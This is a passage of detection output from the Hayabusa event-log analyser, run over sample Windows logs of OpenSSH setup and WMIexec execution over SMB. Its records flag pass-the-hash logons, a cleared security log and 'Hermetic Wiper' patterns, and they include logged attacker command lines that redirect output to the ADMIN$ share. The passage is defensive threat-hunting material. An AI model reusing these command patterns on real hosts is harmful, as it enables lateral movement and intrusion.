$__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.923 
+00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.923 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.924 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.924 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 
10:19:39.096 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:43.030 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallRule): ""Get-NetFirewallRule"" ParameterBinding(Get-NetFirewallRule): name=""Name""; value=""*ssh*"" ParameterBinding(Get-NetFirewallRule): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""TracePolicyStore""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallRule): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:43.031 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" 
ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallRule (CreationClassName = ""MSFT?FW?FirewallRule?OpenSSH-Server-In-..., PolicyRuleName = """", SystemCreationClassName = """", SystemName = """")""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:43.034 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:43.035 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 11:32:00.171 +00:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:00.186 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:00.186 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: 
| IP Addr: 10.23.23.9 | LID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:01.293 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:01.293 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:02.934 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:02.934 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:02.934 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:02.934 
+00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:02.934 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:02.996 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:02.996 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.074 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.074 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 11:32:03.137 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.137 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.468 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x168 | User: FS03VULN$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.468 +00:00,fs03vuln.offsec.lan,4688,high,,Hermetic Wiper TG Process Patterns,,rules/sigma/process_creation_builtin/proc_creation_win_mal_hermetic_wiper_activity.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.468 +00:00,fs03vuln.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.499 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share 
Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.499 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.499 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.499 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.499 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.499 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.499 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.515 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.515 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 
0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.530 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x980 | User: FS03VULN$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.530 +00:00,fs03vuln.offsec.lan,4688,high,,Hermetic Wiper TG Process Patterns,,rules/sigma/process_creation_builtin/proc_creation_win_mal_hermetic_wiper_activity.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.530 +00:00,fs03vuln.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.549 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.549 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: 
__1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.549 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.549 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.565 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.565 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 
0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.801 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.801 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.801 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.801 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.801 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.817 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.817 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.817 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.817 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.817 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.817 
+00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:27.649 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:28.551 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:28.551 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:28.551 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 